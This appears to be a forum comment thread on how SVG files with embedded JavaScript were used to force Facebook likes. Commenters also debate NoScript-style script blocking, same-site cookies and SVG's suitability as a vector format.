That lead to the weird situation where browsers have two ways of embedding an SVG into a web page - embed in an <img> tag and the javascript won't run, but embed it in an <iframe> and it will (but of course iframe height can't auto-size...)
The javascript also means pretty much no user-generated-content sites allow the upload of SVGs. Wikipedia is the only place I can think of - and even they serve the SVG as a PNG almost everywhere.
For this to work, the SVG has to be loaded in an iframe or in a new tab. Or it could be inlined in the HTML.
Nothing special about SVG really as long as you (Facebook) treat SVG files as images and don't inline it.
The SVG part only really comes in as a way to hide script tags from anyone looking at the network requests, but even then it seems that the specific SVG was crafted to download further scripts.
So what's the issue here exactly? It seems that Facebook is still somehow affected by XSS? Neat.
[1] https://www.malwarebytes.com/blog/news/2025/08/adult-sites-t...
- the OS previews it as an image, but on click it opens a website (which to be fair, once you click on a downloaded file, you're already done)
- SVGs are allowed in any "image/*" form, bypassing certain filters
It's a bit annoying the first few days, but then the usual sites you frequent will all be whitelisted and all that's left are random sites you come across infrequently.
Noscript is just too painful for people who want to just browse the web. Its the gentoo of browser extensions. People with massive time & patience can do it yes, but the rest of us are best served by uBlock & standard browser protections.
They do, but as a long-time NoScript user I can tell you from personal experience that this content rarely does anything important, and leaving it out often improves your UX. Problems like you describe pop up... from time to time, for individual sites, maybe a few times a year, and definitely not on "regular sites".
And excluding that content almost invariably improves the page.
No, not really. Usually just the top-level domain is enough. Very occasionally a site will have some other domain they serve from, and it's usually obvious which one to allowlist. It takes like, ten seconds, and you only need to do it once per domain if you make the allowlisting permanent. If you get really impatient, you can just allow all scripts for that tab and you're done.
It is some extra work, and I won't disagree if you think it's too much, but you're really overselling how much extra work it is.
I was already convinced, you don't need to keep selling it ;)
This ought to be the default in every common web browser, just as you should have to look at the data sharing "partners" and decide whether they're benign enough for your taste.
How does this work in reality? Do you just whitelist every site you come across if it's broken? What's the security advantage here? Or do you bail if it requires javascript? What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
I look at the breakage, consider how the site was promoted to me, and make a decision.
> What's the security advantage here?
Most of the bad stuff comes from third parties and doesn't provide essential functionality. A whitelist means you're unblocking one domain at a time, starting with the first party. If there's still an issue, it's usually clear what needs unblocking (e.g. a popular CDN, or one with a name that matches the primary domain) and what's a junk ad server or third-party tracking etc. You can even selectively enable various Google domains for example so that GMail still works but various third-party Google annoyances are suppressed.
> What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Depends on trust levels of course, but there's at least some investigation that can be done to see that it actually is coming from Anubis or Cloudflare.
>Do you just whitelist every site you come across if it's broken?
Mostly, yes, often temporarily for that session, unless I do not trust a website, then I leave. How I deem what is trustworthy or not is just based on my own browsing experience I guess.
>What's the security advantage here?
You can block scripts, frames, media, webgl... Meaning no ads, no JS... Which helps minimize the more common ways to spread malware, or certain dark patterns, as well as just making browsing certain sites more pleasant without all the annoying stuff around.
>Or do you bail if it requires javascript?
If I don't trust a website, yes.
>What about the proliferation of sites that don't really need javascript, but you need to enable it anyways because the site's security provider needs it to verify you're not a bot?
Not all sites require JS to work, or when they do, they do not require every single JS domain on a website to work. An example of this would be something like many of the popular news sites which try to load sometimes JS from 10 different domains or more and only really require one or none to be usable. Take CNN, I do not need to whitelist it's main domain via NoScript to read articles or navigate, but the moment I whitelist CNN.com, i see a flood of other domains to whitelist which are definitely not needed, like CNN.io, cookielaw.org, optimizely.com, etc...
Take Hacker News. It's viable without JS, I can read, navigate and comment, but if I want to use the search function, I need to whitelist algolia.com (which powers the search) or else I just see "This page will only work with JavaScript enabled". The search function not working is the most common issue you'll find if you block all JS by default.
It depends, but frequently, yes. e.g. If I were about to read a tech blog, and see it's from someone that can't make a couple paragraphs work without scripting, then that raises the chance that whatever they had to say was not going to be valuable since they evidently don't know the basics.
It's the frontend version of people writing about distributed clusters to handle a load that a single minipc could comfortably handle.
I do. If a site just doesn't work without JS, it's not likely to be a site that is valuable to me so nothing is lost.
Most websites load their required scripts from their own domain. So you allowlist the domain you are visiting, and things just work. However, many websites also load JS from like 20 other domains for crap like tracking, ads, 3rd party logins, showing cookie popups, autoplaying videos, blah blah blah. Those stay blocked.
Try it out: Visit your local news website, open your uBlock Origin panel, and take a look at all the domains in the left half. There will probably be dozens of domains it's loading JS from. 90% of the time, the only one you actually need is the top one. The rest is 3rd party crap you can leave disabled.
And yeah, if a website doesn't work after allowlisting two or three domains, I usually just give up and leave. Tons of 3rd party JS is a strong indicator that the website is trying to show you ads or exploit you, so it's a good signal that it's not worth your time.
The challenge is sites like StackOverflow which don't completely break, but have annoying formatting issues. Fortunately, uBlock lets you block specific elements easily with a few clicks, and I think you can even sync it to your phone.
Even if other users do indeed whitelist everything needed in order to make sites work, they will still end up with many/most of the third-party scripts blocked.
But does not fix the CSRF vulnerability, apparently.
In a world where same-site cookies are the default you have to actively opt-in to this sort of thing.
Facebook might not care, but it is obviously a vulnerability. Sites can forge likes from users (which IIRC appear on timelines?).
It would be nice if we had one of those, but SVG is not it, at least not unless you’re willing to gloss HTML as “an open format for rendering reflowable text”. SVG is a full platform for web applications with fixed-layout graphics and rich animations, essentially Flash with worse development tools.
There have been some attempts to define a subset of SVG that represents a picture, like SVG Tiny, but that feels about as likely to succeed as defining JSON by cutting things out of JavaScript. (I mean, it kind of worked for making EPUB from HTML+CSS... If you disregard all the insane feature variation across e-readers that is.) Meanwhile, other vector graphics formats are either ancient and not very common (CGM, EPS, WMF/EMF) or exotic and very not common (HVIF, IconVG, TinyVG).
(My personal benchmark for an actual vector format would be: does it allow the renderer to avoid knowing the peculiarities of Arabic, Burmese, Devanagari, or Mongolian?)
The best thing about flash was that it let non-coders create interactive things. The editor with a timeline + code you could stick to objects was the best feature.
I had to learn to code properly after flash died, which probably was a good thing, but I still miss that way of making things.
Also the dates don't work. HTTP/1.1 with gzip/compress/deflate encodints was live in browsers and servers with inline compression well before the standard was published in RFC 2068 in 1997. SVG's spec was four years behind that, and IIRC adoption being pretty glacial as far as completeness and compliance.
The linked article just regurtitates the source.
If you want real isolation, user browser profiles.
Yes!. And that container is in a Ffx instance, accessed as a remote app (here now but diff container).
Why are they clicking like buttons instead of stealing money from bank accounts then?
I think I'm missing something; if you can embed arbitrary JavaScript in the SVG, why is a click necessary to make that JavaScript run? And if JavaScript on your page can exploit CSRF on Facebook, why is embedding it in an SVG necessary?
A human clicking something on the site tends to get around bot detection and similar systems put in place to prevent automation. This is a basic “get the user to take an action they don’t know the outcome of” attack.
Eg you can’t enable sound on a webpage without a real click.
Running JS inside an image format sounds like a thing they could add permissions for (or a click-to-play overlay), especially if it can talk to other sites.
Wouldn't that be discovered pretty quickly, when Bob's family and friends see porn promoted to them because John apparently liked it on Facebook. Eventually, one of them would mention it to him.
"Y'know, Bob, you probably don't want to be liking that on your main Facebook account... Are you feeling OK?"
I see what you did there ;)
If you are a woman, did you know Facebook has been stealing menstruation data from apps and using it to target ads to you?
If you take photos with your smartphone, you know meta has been using them to train their ai? Even if you haven't published them on Facebook?
To say nothing of Facebook's complicity in dividing cultures and fomenting violence and hate...
Facebook Marketplace supplanted a number of earlier sites - like Hotpads for rentals and Craigslist for cars.
In mid 2021 there were hundreds of applicants per rental listing - even on Marketplace. No one had a luxury of listing preference.
Well there's your problem right there.